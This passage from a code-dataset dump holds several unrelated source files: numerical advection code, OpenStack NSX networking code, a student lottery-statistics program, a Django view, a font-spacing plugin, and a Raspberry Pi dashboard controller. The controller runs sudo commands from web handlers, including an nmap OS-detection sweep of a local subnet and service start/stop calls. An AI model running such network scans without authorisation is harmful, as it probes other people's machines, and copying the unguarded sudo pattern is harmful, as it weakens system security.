phi.bnd[B].val, \n phi.val, \n phi.bnd[T].val,\n phi.bnd[T].val))) \n d_z[(d_z > -TINY) & (d_z <= 0.0)] = -TINY\n d_z[(d_z >= 0.0) & (d_z < +TINY)] = +TINY\n\n # Ratio of consecutive 
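gradients drives the limiter choice below.\n #\n # Hedged reference for the limiter formulas applied further down (assuming\n # mx/mn are the element-wise max/min helpers imported from pyns.operators):\n # minmod: psi = mx(0, mn(r, 1))\n # superbee: psi = mx(0, mn(2*r, 1), mn(r, 2))\n # koren: psi = mx(0, mn(2*r, (2+r)/3, 2))\n #\n # Ratio of consecutive 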
gradients for positive and negative flow\n r_x_we = d_x[1:-1,:,:] / d_x[0:-2,:,:] \n r_x_ew = d_x[2:, :,:] / d_x[1:-1,:,:] \n r_y_sn = d_y[:,1:-1,:] / d_y[:,0:-2,:] \n r_y_ns = d_y[:,2:, :] / d_y[:,1:-1,:] \n r_z_bt = d_z[:,:,1:-1] / d_z[:,:,0:-2] \n r_z_tb = d_z[:,:,2: ] / d_z[:,:,1:-1] \n\n flow_we = u_fac >= 0\n flow_ew = lnot(flow_we)\n flow_sn = v_fac >= 0\n flow_ns = lnot(flow_sn)\n flow_bt = w_fac >= 0\n flow_tb = lnot(flow_bt)\n\n r_x = r_x_we * flow_we + r_x_ew * flow_ew\n r_y = r_y_sn * flow_sn + r_y_ns * flow_ns\n r_z = r_z_bt * flow_bt + r_z_tb * flow_tb\n\n # Apply a limiter\n if lim_name == 'upwind':\n psi_x = r_x * 0.0\n psi_y = r_y * 0.0\n psi_z = r_z * 0.0\n elif lim_name == 'minmod':\n psi_x = mx(zeros(r_x.shape),mn(r_x,ones(r_x.shape)))\n psi_y = mx(zeros(r_y.shape),mn(r_y,ones(r_y.shape)))\n psi_z = mx(zeros(r_z.shape),mn(r_z,ones(r_z.shape)))\n elif lim_name == 'superbee':\n psi_x = mx(zeros(r_x.shape),mn(2.*r_x, ones(r_x.shape)),mn(r_x, 2.))\n psi_y = mx(zeros(r_y.shape),mn(2.*r_y, ones(r_y.shape)),mn(r_y, 2.))\n psi_z = mx(zeros(r_z.shape),mn(2.*r_z, ones(r_z.shape)),mn(r_z, 2.))\n elif lim_name == 'koren':\n psi_x = mx(zeros(r_x.shape),mn(2.*r_x,(2.+r_x)/3.,2.*ones(r_x.shape)))\n psi_y = mx(zeros(r_y.shape),mn(2.*r_y,(2.+r_y)/3.,2.*ones(r_y.shape)))\n psi_z = mx(zeros(r_z.shape),mn(2.*r_z,(2.+r_z)/3.,2.*ones(r_z.shape)))\n\n flux_fac_lim_x = cat_x((phi.bnd[W].val, phi.val)) * u_fac * flow_we \\\n + cat_x((phi.val, phi.bnd[E].val)) * u_fac * flow_ew \\\n + 0.5 * abs(u_fac) * (1 - abs(u_fac) * dt / del_x) \\\n * ( psi_x[:,:,:] * d_x[0:-2,:,:] * flow_we \\\n + psi_x[:,:,:] * d_x[1:-1,:,:] * flow_ew )\n flux_fac_lim_y = cat_y((phi.bnd[S].val, phi.val)) * v_fac * flow_sn \\\n + cat_y((phi.val, phi.bnd[N].val)) * v_fac * flow_ns \\\n + 0.5 * abs(v_fac) * (1 - abs(v_fac) * dt / del_y) \\\n * ( psi_y[:,:,:] * d_y[:,0:-2,:] * flow_sn \\\n + psi_y[:,:,:] * d_y[:,1:-1,:] * flow_ns )\n flux_fac_lim_z = cat_z((phi.bnd[B].val, phi.val)) * w_fac * flow_bt \\\n + cat_z((phi.val, phi.bnd[T].val)) * w_fac * flow_tb \\\n + 0.5 * abs(w_fac) * (1 - abs(w_fac) * dt / del_z) \\\n * ( psi_z[:,:,:] * d_z[:,:,0:-2] * flow_bt \\\n + psi_z[:,:,:] * d_z[:,:,1:-1] * flow_tb )\n\n # Multiply with face areas\n flux_fac_lim_x = rho_x_fac * flux_fac_lim_x * a_x_fac\n flux_fac_lim_y = rho_y_fac * flux_fac_lim_y * a_y_fac\n flux_fac_lim_z = rho_z_fac * flux_fac_lim_z * a_z_fac\n\n # Sum contributions from all directions up\n c = dif_x(flux_fac_lim_x) + \\\n dif_y(flux_fac_lim_y) + \\\n dif_z(flux_fac_lim_z)\n\n return c # end of function\n","sub_path":"pyns/discretization/advection.py","file_name":"advection.py","file_ext":"py","file_size_in_byte":12154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"482718618","text":"# Copyright 2013 VMware, Inc.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nfrom eventlet import greenthread\nfrom neutron_lib import constants as const\nfrom neutron_lib import exceptions as ntn_exc\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\n\nfrom neutron.api.rpc.agentnotifiers import dhcp_rpc_agent_api\nfrom neutron.db import db_base_plugin_v2\nfrom neutron.db import models_v2\n\nfrom vmware_nsx._i18n import _LE, _LI, _LW\nfrom vmware_nsx.api_client import exception as api_exc\nfrom vmware_nsx.common import config\nfrom vmware_nsx.common import exceptions as nsx_exc\n\nLOG = logging.getLogger(__name__)\n\nMETADATA_DEFAULT_PREFIX = 30\nMETADATA_SUBNET_CIDR = '169.254.169.252/%d' % METADATA_DEFAULT_PREFIX\nMETADATA_GATEWAY_IP = '169.254.169.253'\nMETADATA_DHCP_ROUTE = '169.254.169.254/32'\n\n\ndef handle_network_dhcp_access(plugin, context, network, action):\n pass\n\n\ndef handle_port_dhcp_access(plugin, context, port_data, action):\n pass\n\n\ndef handle_port_metadata_access(plugin, context, port, is_delete=False):\n # For instances supporting DHCP option 121 and created in a\n # DHCP-enabled but isolated network. This method is useful\n # only when no network namespace support.\n plugin_cfg = getattr(cfg.CONF, plugin.cfg_group)\n if (plugin_cfg.metadata_mode == config.MetadataModes.INDIRECT and\n port.get('device_owner') == const.DEVICE_OWNER_DHCP):\n if not port.get('fixed_ips'):\n # If port does not have an IP, the associated subnet is in\n # deleting state.\n LOG.info(_LI('Port %s has no IP due to subnet in deleting state'),\n port['id'])\n return\n fixed_ip = port['fixed_ips'][0]\n query = context.session.query(models_v2.Subnet)\n subnet = query.filter(\n models_v2.Subnet.id == fixed_ip['subnet_id']).one()\n # If subnet does not have a gateway, do not create metadata\n # route. This is done via the enable_isolated_metadata\n # option if desired.\n if not subnet.get('gateway_ip'):\n LOG.info(_LI('Subnet %s does not have a gateway, the '\n 'metadata route will not be created'),\n subnet['id'])\n return\n metadata_routes = [r for r in subnet.routes\n if r['destination'] == METADATA_DHCP_ROUTE]\n if metadata_routes:\n # We should have only a single metadata route at any time\n # because the route logic forbids two routes with the same\n # destination. 
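So at most one route needs handling here.\n # 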
Update next hop with the provided IP address\n if not is_delete:\n metadata_routes[0].nexthop = fixed_ip['ip_address']\n else:\n context.session.delete(metadata_routes[0])\n else:\n # add the metadata route\n route = models_v2.SubnetRoute(\n subnet_id=subnet.id,\n destination=METADATA_DHCP_ROUTE,\n nexthop=fixed_ip['ip_address'])\n context.session.add(route)\n\n\ndef handle_router_metadata_access(plugin, context, router_id, interface=None):\n # For instances created in a DHCP-disabled network but connected to\n # a router.\n # The parameter \"interface\" is only used as a Boolean flag to indicate\n # whether to add (True) or delete (False) an internal metadata network.\n plugin_cfg = getattr(cfg.CONF, plugin.cfg_group)\n if plugin_cfg.metadata_mode != config.MetadataModes.DIRECT:\n LOG.debug(\"Metadata access network is disabled\")\n return\n if not cfg.CONF.allow_overlapping_ips:\n LOG.warning(_LW(\"Overlapping IPs must be enabled in order to setup \"\n \"the metadata access network\"))\n return\n ctx_elevated = context.elevated()\n on_demand = getattr(plugin_cfg, 'metadata_on_demand', False)\n try:\n if interface:\n # Add interface case\n filters = {'device_id': [router_id],\n 'device_owner': const.ROUTER_INTERFACE_OWNERS,\n 'fixed_ips': {'ip_address': [METADATA_GATEWAY_IP]}}\n # Retrieve metadata ports by calling database plugin\n ports = db_base_plugin_v2.NeutronDbPluginV2.get_ports(\n plugin, ctx_elevated, filters=filters)\n if not ports and (not on_demand or\n _find_dhcp_disabled_subnet_by_router(\n plugin, ctx_elevated, router_id)):\n _create_metadata_access_network(\n plugin, ctx_elevated, router_id)\n else:\n # Remove interface case\n filters = {'device_id': [router_id],\n 'device_owner': const.ROUTER_INTERFACE_OWNERS}\n # Retrieve router interface ports by calling database plugin\n ports = db_base_plugin_v2.NeutronDbPluginV2.get_ports(\n plugin, ctx_elevated, filters=filters)\n if len(ports) == 1 or (on_demand and not\n _find_dhcp_disabled_subnet_by_port(\n plugin, ctx_elevated, ports)):\n # Delete the internal metadata network if the router port\n # is the last port left or no more DHCP-disabled subnet\n # attached to the router.\n _destroy_metadata_access_network(\n plugin, ctx_elevated, router_id, ports)\n # TODO(salvatore-orlando): A better exception handling in the\n # NSX plugin would allow us to improve error handling here\n except (ntn_exc.NeutronException, nsx_exc.NsxPluginException,\n api_exc.NsxApiException):\n # Any exception here should be regarded as non-fatal\n LOG.exception(_LE(\"An error occurred while operating on the \"\n \"metadata access network for router:'%s'\"),\n router_id)\n\n\ndef _find_metadata_port(plugin, context, ports):\n for port in ports:\n for fixed_ip in port['fixed_ips']:\n if fixed_ip['ip_address'] == METADATA_GATEWAY_IP:\n return port\n\n\ndef _find_dhcp_disabled_subnet_by_port(plugin, context, ports):\n for port in ports:\n for fixed_ip in port['fixed_ips']:\n subnet = plugin.get_subnet(context, fixed_ip['subnet_id'])\n if not subnet['enable_dhcp']:\n return subnet\n\n\ndef _find_dhcp_disabled_subnet_by_router(plugin, context, router_id):\n filters = {'device_id': [router_id],\n 'device_owner': const.ROUTER_INTERFACE_OWNERS}\n ports = db_base_plugin_v2.NeutronDbPluginV2.get_ports(\n plugin, context, filters=filters)\n return _find_dhcp_disabled_subnet_by_port(plugin, context, ports)\n\n\ndef _create_metadata_access_network(plugin, context, router_id):\n # Add network\n # Network name is likely to be truncated on NSX\n net_data = {'name': 
'meta-%s' % router_id,\n 'tenant_id': '', # intentionally not set\n 'admin_state_up': True,\n 'port_security_enabled': False,\n 'shared': False,\n 'status': const.NET_STATUS_ACTIVE}\n meta_net = plugin.create_network(context,\n {'network': net_data})\n greenthread.sleep(0) # yield\n plugin.schedule_network(context, meta_net)\n greenthread.sleep(0) # yield\n # From this point on there will be resources to garbage-collect\n # in case of failures\n meta_sub = None\n try:\n # Add subnet\n subnet_data = {'network_id': meta_net['id'],\n 'tenant_id': '', # intentionally not set\n 'name': 'meta-%s' % router_id,\n 'ip_version': 4,\n 'shared': False,\n 'cidr': METADATA_SUBNET_CIDR,\n 'enable_dhcp': True,\n # Ensure default allocation pool is generated\n 'allocation_pools': const.ATTR_NOT_SPECIFIED,\n 'gateway_ip': METADATA_GATEWAY_IP,\n 'dns_nameservers': [],\n 'host_routes': []}\n meta_sub = plugin.create_subnet(context,\n {'subnet': subnet_data})\n greenthread.sleep(0) # yield\n plugin.add_router_interface(context, router_id,\n {'subnet_id': meta_sub['id']})\n greenthread.sleep(0) # yield\n # Tell to start the metadata agent proxy, only if we had success\n _notify_rpc_agent(context, {'subnet': meta_sub}, 'subnet.create.end')\n except (ntn_exc.NeutronException,\n nsx_exc.NsxPluginException,\n api_exc.NsxApiException):\n # It is not necessary to explicitly delete the subnet\n # as it will be removed with the network\n plugin.delete_network(context, meta_net['id'])\n\n\ndef _destroy_metadata_access_network(plugin, context, router_id, ports):\n if not ports:\n return\n meta_port = _find_metadata_port(plugin, context, ports)\n if not meta_port:\n return\n meta_net_id = meta_port['network_id']\n meta_sub_id = meta_port['fixed_ips'][0]['subnet_id']\n plugin.remove_router_interface(\n context, router_id, {'port_id': meta_port['id']})\n greenthread.sleep(0) # yield\n context.session.expunge_all()\n try:\n # Remove network (this will remove the subnet too)\n plugin.delete_network(context, meta_net_id)\n greenthread.sleep(0) # yield\n except (ntn_exc.NeutronException, nsx_exc.NsxPluginException,\n api_exc.NsxApiException):\n # must re-add the router interface\n plugin.add_router_interface(context, router_id,\n {'subnet_id': meta_sub_id})\n # Tell to stop the metadata agent proxy\n _notify_rpc_agent(\n context, {'network': {'id': meta_net_id}}, 'network.delete.end')\n\n\ndef _notify_rpc_agent(context, payload, event):\n if cfg.CONF.dhcp_agent_notification:\n dhcp_notifier = dhcp_rpc_agent_api.DhcpAgentNotifyAPI()\n dhcp_notifier.notify(context, payload, event)\n","sub_path":"vmware_nsx/dhcp_meta/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":10614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428500979","text":"#Function that reads the matrix given by the EP assignment\ndef LeiaMatriz (NomeArquivo):\n\tmat = []\n\ttry:\n\t\tarq = open(NomeArquivo, \"r\")\n\texcept:\n\t\tprint(\"Erro na abertura do arquivo (open).\")\n\t\treturn None\n\ti = 0\n\tfor linha in arq:\n\t\ttry:\n\t\t\tlin = linha[:len(linha)-1]\n\t\t\tv = lin.split('\\t')\n\t\t\tmat.append([])\n\t\t\tfor j in range (8):\n\t\t\t\tif j == 1:\n\t\t\t\t\tmat[i].append(v[1])\n\t\t\t\telse:\n\t\t\t\t\tmat[i].append(int(v[j]))\n\t\t\ti += 1\n\t\texcept:\n\t\t\tprint (\"Erro no split(), no int() ou no append().\")\n\t\t\treturn None\n\t#Consistency check of the matrix values\n #They must be between 1 and 60, i.e. in [1,60]\n\tna = 0\n\tfor l in range (len(mat)):\n\t\tfor g in range 
(2,8):\n\t\t\t#If they are not in the interval [1,60], an error message is printed\n\t\t\t#Closes the file\n\t\t\t#Returns None\n\t\t\tif mat[l][g] > 60 or mat[l][g] < 1:\n\t\t\t\tna = 1\n\t\t\t\tprint(\"Os números apresentados no arquivo devem estar entre 1 e 60. Tente novamente com um arquivo válido.\")\n\t\t\t\tarq.close()\n\t\t\t\treturn None\n #If the values are between 1 and 60 the function returns mat\n #The program continues normally\n\tif na == 0:\n\t\tarq.close()\n\t\treturn mat\n\n\n#Function that answers questions 1 and 2 of the EP assignment\ndef pergunta1e2 (matriz):\n\t#Creates a list with 60 elements\n\t#All of them equal to 0\n\tp1 = [0]*60\n\t#Counts how many times the numbers from 1 to 60 were drawn\n\t#And stores the count in list p1\n\tfor j in range(60):\n\t\tfor i in range(2,8):\n\t\t\tfor a in range (len(matriz)):\n\t\t\t\t#From the parameter matrix\n\t\t\t\t#If some element of it equals j (between 1 and 60)\n\t\t\t\tif matriz[a][i] == (j+1):\n\t\t\t\t\t#Adds 1 to p1[j]\n\t\t\t\t\t#Which will serve as a counter based on the index\n\t\t\t\t\t#That is, index 0 refers to number 1\n\t\t\t\t\t#The value at index 0 tells how many times number 1 was drawn\n\t\t\t\t\tp1[j] = p1[j] + 1\n\t#Creates a second list p12 with 60 elements, all equal to 0\n\tp12 = [0]*60\n\t#Stores the data of p1 in p12\n\tfor k in range(60):\n\t\tp12[k] = p1[k]\n\t#Sorts p1\n\tp1.sort()\n\t#Puts it in descending order\n\tp1.reverse()\n\t#Prints the header\n\tprint()\n\tprint(\"Sorteios por número (ordem decrescente)\")\n\tprint()\n\tprint(\" Números Sorteios\")\n\t#Prints the drawn numbers\n\t#And the number of times they were drawn\n\t#In descending order\n\tfor g in range(60):\n\t\tprint(\"%5d %12d\" %((p12.index(p1[g])+1), (p1[g])))\n\t\t#Zeroes the number already printed so repetitions do not happen\n\t\tp12[p12.index(p1[g])] = 0\n\n\n#Function that answers questions 3 and 4 of the EP assignment\ndef pergunta3e4 (matriz):\n\t#Prints the header\n\tprint()\n\tprint(\"Data mais recente que cada número foi sorteado\")\n\tprint()\n\tprint(\" Números Sorteios Data\")\n\tprint()\n\t#Creates a matrix the size of the parameter matrix\n\t#With elements equal to zero\n\tp14 = [0]*len(matriz)\n\t#Stores the drawn numbers in it\n\tfor y in range (len(matriz)):\n\t\tp14[y] = matriz[y][2:8]\n\t#Sorts the elements of the sublists in p14\n\t#Sorts the numbers drawn in each draw in ascending order\n\tfor t in range (len(p14)):\n\t\tp14[t].sort()\n\t#Prints the drawn number, the draw and the date it was drawn\n\tfor q in range (len(p14)):\n\t\tfor u in range (6):\n\t\t\tif p14[q][u] != 0:\n\t\t\t\tapareceprim = p14[q][u]\n\t\t\t\tprint (\"%5d %12d\" %(p14[q][u], matriz[q][0]), end=\"\")\n\t\t\t\tprint(\" \", matriz[q][1])\n\t\t\t\t#Zeroes the number that was printed\n\t\t\t\tp14[q][u] = 0\n\t\t\t\t#Zeroes all the other equal ones that come after it\n\t\t\t\t#So repetitions do not happen\n\t\t\t\t#And prints only the one drawn on the most recent date\n\t\t\t\tfor t in range (len(p14)):\n\t\t\t\t\tfor b in range (6):\n\t\t\t\t\t\tif p14[t][b] == apareceprim:\n\t\t\t\t\t\t\tp14[t][b] = 0\n\n\n\n\n#Main function of the program\ndef main():\n\t#Asks for the file name\n\tnomearq = str(input(\"Entre com o nome do arquivo:\"))\n\t#Calls LeiaMatriz and stores matrix mat in variable matt if the file passes the consistency check\n\tmatt = LeiaMatriz(nomearq)\n\t#If it does not pass the consistency check matt holds None\n\t#If that happens, main() is executed again\n\tif matt == None:\n\t\tmain()\n\t#If matt has not stored None\n\t#The program continues normally\n\telse:\n\t\t#Calls pergunta1e2 with variable matt as the parameter\n\t\tpergunta1e2(matt)\n\t\t#Calls pergunta3e4 with variable matt as the parameter\n\t\tpergunta3e4(matt)\n\nmain()\n\n","sub_path":"Primeiro Semestre - MAC 0110 - Introdução à Computação/Exercício Programa 3/ep3final2.py","file_name":"ep3final2.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252820017","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-x86_64/egg/gopro2gpx/klvdata.py\n# Compiled at: 2020-04-24 06:21:51\n# Size of source mod 2**32: 2160 bytes\nimport struct\nfrom gopro2gpx.fourCC import Manage, skip_labels\n\nclass KLVData:\n __doc__ = '\\n format: Header: 32-bit, 8-bit, 8-bit, 16-bit\\n Data: 32-bit aligned, padded with 0\\n '\n binary_format = '>4sBBH'\n\n def __init__(self, data, offset):\n s = struct.Struct(KLVData.binary_format)\n self.fourCC, self.type, self.size, self.repeat = s.unpack_from(data, offset=offset)\n self.fourCC = self.fourCC.decode()\n self.type = int(self.type)\n self.length = self.size * self.repeat\n self.padded_length = self.pad(self.length)\n self.rawdata = self.readRawData(data, offset)\n self.data = Manage(self)\n\n def __str__(self):\n stype = chr(self.type)\n if self.type == 0:\n stype = 'null'\n if self.rawdata:\n rawdata = self.rawdata\n rawdata = ' '.join((format(x, '02x') for x in rawdata))\n rawdatas = self.rawdata[0:10]\n else:\n rawdata = 'null'\n rawdatas = 'null'\n s = '%s %s %d %s {%s} |%s| [%s]' % (self.fourCC, stype, self.size, self.repeat, self.data, rawdatas, rawdata)\n return s\n\n def pad(self, n, base=4):\n \"\"\"pad the number so it is % base == 0\"\"\"\n i = n\n while i % base != 0:\n i += 1\n\n return i\n\n def skip(self):\n return self.fourCC in skip_labels\n\n def readRawData(self, data, offset):\n \"\"\"read the raw data, don't process anything, just get the bytes\"\"\"\n if self.type == 0:\n return\n else:\n num_bytes = self.pad(self.size * self.repeat)\n if num_bytes == 0:\n rawdata = None\n else:\n fmt = '>' + str(num_bytes) + 's'\n s = struct.Struct(fmt)\n rawdata, = s.unpack_from(data, offset=(offset + 8))\n return rawdata","sub_path":"pycfiles/gopro2gpx-0.1-py3.8/klvdata.cpython-38.py","file_name":"klvdata.cpython-38.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"355138515","text":"from django.shortcuts import render, redirect\nfrom .models import User\n\ndef index(request):\n context= {\n 'all_users': User.objects.all(),\n }\n return render(request, 'index.html', context)\n\n\ndef process(request):\n if request.method == 'POST':\n new_user= User.objects.create(first_name= request.POST['first_name'], last_name= request.POST['last_name'],\n email_address= request.POST['email_address'], age= request.POST['age'])\n print(new_user)\n return redirect('/')","sub_path":"users_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"397558664","text":"# coding=utf-8\nimport commands\nimport itertools\nimport os\nimport platform\nimport re\nimport 
socket\nimport struct\n\n\ndef login(): ######## Login screen ########\n return response.render(\"estrutura/login.html\")\n\n\ndef dash(): ######## Dashboard screen ########\n ##qtde_os = qtde_so()\n from subprocess import check_output\n saida_ip_externo = commands.getoutput('sudo curl ifconfig.pro')\n ip_externo = saida_ip_externo.split(\"\\n\")\n\n ips = check_output(['hostname', '--all-ip-addresses'])\n\n return response.render(\"estrutura/dash.html\", ip_externo=ip_externo, ips=ips)\n\n\ndef relatorio(): ######## Report screen ########\n return response.render(\"estrutura/relatorio.html\")\n\n\ndef teste():\n return response.render(\"estrutura/teste.html\")\n\n\ndef scan(): ######## Scan screen where the scans are 'started' ########\n return response.render('estrutura/scan.html')\n\n\ndef settings(): ######## Settings screen ########\n ### Services - start/stop/restart ###\n server = get_server()\n saida_apache = commands.getoutput('sudo /etc/init.d/apache2 status')\n dict_apache = saida_apache.split(\"\\n\")\n retorno_apache = None\n for line in dict_apache:\n if 'running' in line:\n retorno_apache = 'Ativo'\n break\n else:\n retorno_apache = 'Inativo'\n\n saida_openvpn = commands.getoutput('sudo /etc/init.d/openvpn status')\n dict_openvpn = saida_openvpn.split(\"\\n\")\n retorno_openvpn = None\n for line in dict_openvpn:\n if 'inactive' in line:\n retorno_openvpn = 'Inativo'\n break\n else:\n retorno_openvpn = 'Ativo'\n\n saida_ssh = commands.getoutput('sudo /etc/init.d/ssh status')\n dict_ssh = saida_ssh.split(\"\\n\")\n retorno_ssh = None\n for line in dict_ssh:\n if 'inactive' in line:\n retorno_ssh = 'Inativo'\n break\n else:\n retorno_ssh = 'Ativo'\n\n ### End of services ###\n\n return response.render('estrutura/settings.html', retorno_apache=retorno_apache, dict_apache=dict_apache,\n dict_openvpn=dict_openvpn, retorno_openvpn=retorno_openvpn, retorno_ssh=retorno_ssh,\n dict_ssh=dict_ssh, server=server)\n\n############################\n\ndef iniciar_servico_apache():\n try:\n os.system('sudo /etc/init.d/apache2 start')\n except Exception as error:\n return error\n\ndef parar_servico_apache():\n try:\n os.system('sudo /etc/init.d/apache2 stop')\n except Exception as error:\n return error\n\n\ndef reiniciar_servico_apache():\n try:\n os.system('sudo /etc/init.d/apache2 restart')\n except Exception as error:\n return error\n\n############################\n\ndef iniciar_servico_openvpn():\n try:\n os.system(\"sudo /etc/init.d/openvpn start\")\n except Exception as error:\n return error\n\ndef parar_servico_openvpn():\n try:\n os.system(\"sudo /etc/init.d/openvpn stop\")\n except Exception as error:\n return error\n\n\ndef reiniciar_servico_openvpn():\n try:\n os.system(\"sudo /etc/init.d/openvpn restart\")\n except Exception as error:\n return error\n\n############################\n\ndef iniciar_servico_ssh():\n try:\n os.system(\"sudo /etc/init.d/ssh start\")\n except Exception as error:\n return error\n\ndef parar_servico_ssh():\n try:\n os.system(\"sudo /etc/init.d/ssh stop\")\n except Exception as error:\n return error\n\n\ndef reiniciar_servico_ssh():\n try:\n os.system(\"sudo /etc/init.d/ssh restart\")\n except Exception as error:\n return error\n\n#######################################################################\n\ndef get_ip(): ### Function that returns the ip address of the LAN/WLAN interfaces ###\n global ip\n f = os.popen('ifconfig')\n for iface in [' '.join(i) for i in iter(lambda: list(itertools.takewhile(lambda l: not l.isspace(),f)), [])]:\n if 
re.findall('^(eth|wlan)[0-9]',iface) and re.findall('RUNNING',iface):\n ip = re.findall('(?<=inet\\saddr:)[0-9\\.]+',iface)\n if ip:\n return ip[0]\n return ip\n\n\ndef gateway(): ### Returns the gateway IP address ###\n \"\"\"Read the default gateway directly from /proc.\"\"\"\n with open(\"/proc/net/route\") as fh:\n for line in fh:\n fields = line.strip().split()\n if fields[1] != '00000000' or not int(fields[3], 16) & 2:\n continue\n\n return socket.inet_ntoa(struct.pack(\"<L\", int(fields[2], 16)))\n\n\ndef qtde_so():\n qtde_os = {}\n qtde_os['Windows'] = commands.getoutput('sudo nmap --top-ports 1 -O -F -n -Pn -r 192.168.1.0/24 | grep \"Running: \"> /tmp/os; echo \"$(cat /tmp/os | grep -i Windows | wc -l)\"')\n qtde_os['Linux'] = commands.getoutput('sudo nmap --top-ports 1 -O -F -n -Pn -r 192.168.1.0/24 | grep \"Running: \"> /tmp/os; echo \"$(cat /tmp/os | grep -i Linux | wc -l)\"')\n\n return str(qtde_os).replace('{','').replace('}','')\n\n\ndef get_server(): ######## Hardware/software information of the Raspberry ########\n server = {}\n var = platform.platform()\n server['distribuicao'] = var.split('-')[6]\n server['versao'] = var.split('-')[7]\n server['arch'] = platform.processor()\n server['host'] = platform.uname()[1]\n server['kernel'] = platform.uname()[2]\n server['pythonv'] = platform.python_version()\n server['postgresql'] = commands.getoutput(\"psql --version\")\n server['memory'] = int(commands.getoutput(\"cat /proc/meminfo | grep MemTotal\").split(':')[1].split('k')[0])/1000\n disk = os.statvfs(\"/\")\n totalBytes = float(disk.f_bsize*disk.f_blocks)\n server['disk'] = \"%.2f GBytes\" % (totalBytes/1024/1024/1024)\n\n #var = commands.getoutput(\"atop | grep cpu\")\n return server\n\n\n### Function to show the time in real time ###\ndef atualiza_hora():\n from datetime import datetime\n item = str(datetime.now().strftime('%H:%M:%S - %d/%m/%Y'))\n\n return item\n","sub_path":"controllers/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248574818","text":"# encoding: utf-8\nfrom __future__ import division, print_function, unicode_literals\n\nimport SegmentsPen\n\nfrom GlyphsApp import *\n\nfrom Foundation import NSBundle, NSOffsetRect, NSIntersectsRect, NSPointInRect, NSMinX, NSMinY, NSMaxX, NSMaxY\nimport objc\n_path = NSBundle.mainBundle().bundlePath()\n_path = _path+\"/Contents/Frameworks/GlyphsCore.framework/Versions/A/Resources/BridgeSupport/GlyphsCore.bridgesupport\"\nf = open(_path)\nobjc.parseBridgeSupport(f.read(), globals(), _path)\nf.close()\n\ndef segmentInBound(segment, bounds):\n minX = NSMinX(bounds)\n minY = NSMinY(bounds)\n maxX = NSMaxX(bounds)\n maxY = NSMaxY(bounds)\n for point in segment:\n if NSPointInRect(point, bounds):\n return True\n found = minX <= point[0] <= maxX\n if found:\n return True\n return False\n \nclass Touche(object):\n \"\"\"Checks a font for touching glyphs.\n \n font = CurrentFont()\n a, b = font['a'], font['b']\n touche = Touche(font)\n touche.checkPair(a, b)\n touche.findTouchingPairs([a, b])\n \n Public methods: checkPair, findTouchingPairs\n \"\"\"\n\n def __init__(self, font, masterID):\n self.font = font\n self.penCache = {}\n self._masterID = masterID\n #self.flatKerning = font.naked().flatKerning\n\n def findTouchingPairs(self, glyphs):\n \"\"\"Finds all touching pairs in a list of glyphs.\n\n Returns a list of tuples containing the names of overlapping glyphs\n \"\"\"\n \n # lookup all sidebearings\n lsb, rsb = ({} for i in range(2))\n for g in glyphs:\n lsb[g], rsb[g] = g.LSB, g.RSB\n self.lsb, self.rsb = lsb, rsb\n \n pairs = [(g1, g2) for g1 in glyphs for g2 in 
glyphs]\n return [(g1.parent.name, g2.parent.name) for (g1, g2) in pairs if self.checkPair(g1, g2)]\n\n # def getKerning(self, g1, g2):\n # return self.flatKerning.get((g1.name, g2.name), 0)\n\n def checkPair(self, g1, g2):\n \"\"\"New checking method contributed by Frederik\n\n Returns True if the pair overlaps.\n \"\"\"\n if Glyphs.versionNumber >= 3:\n kern = g1.nextKerningForLayer_direction_(g2, LTR)\n else:\n kern = g1.rightKerningForLayer_(g2)\n if kern > 10000:\n kern = 0\n # Check sidebearings first (PvB's idea)\n if self.rsb[g1] + self.lsb[g2] + kern > 0:\n return False\n\n # get the bounds and check them\n bounds1 = g1.bounds\n bounds2 = g2.bounds \n\n bounds2 = NSOffsetRect(bounds2, g1.width + kern, 0)\n # check for intersection bounds\n intersectingBounds = NSIntersectsRect(bounds1, bounds2)\n if not intersectingBounds:\n return False\n\n # create a pen for g1 with a shifted rect, draw the glyph into the pen\n pen1 = self.penCache.get(g1.name, None)\n if not pen1:\n pen1 = SegmentsPen.SegmentsPen(self.font, self._masterID)\n g1.draw(pen1)\n self.penCache[g1.name] = pen1\n \n # create a pen for g2 with a shifted rect and move each found segment with the width and kerning\n \n pen2 = self.penCache.get(g2.name, None)\n if not pen2:\n pen2 = SegmentsPen.SegmentsPen(self.font, self._masterID)\n g2.draw(pen2)\n self.penCache[g2.name] = pen2\n \n offset = g1.width+kern\n \n for segment1 in pen1.segments:\n if not NSIntersectsRect(segment1, bounds2):\n continue\n \n for segment2 in pen2.segments:\n segment2 = [(p[0] + offset, p[1]) for p in segment2]\n if not segmentInBound(segment2, bounds1):\n continue\n if len(segment1) == 4 and len(segment2) == 4:\n a1, a2, a3, a4 = segment1\n b1, b2, b3, b4 = segment2\n result = GSIntersectBezier3Bezier3(a1, a2, a3, a4, b1, b2, b3, b4)\n elif len(segment1) == 4:\n p1, p2, p3, p4 = segment1\n a1, a2 = segment2\n result = GSIntersectBezier3Line(p1, p2, p3, p4, a1, a2)\n elif len(segment2) == 4:\n p1, p2, p3, p4 = 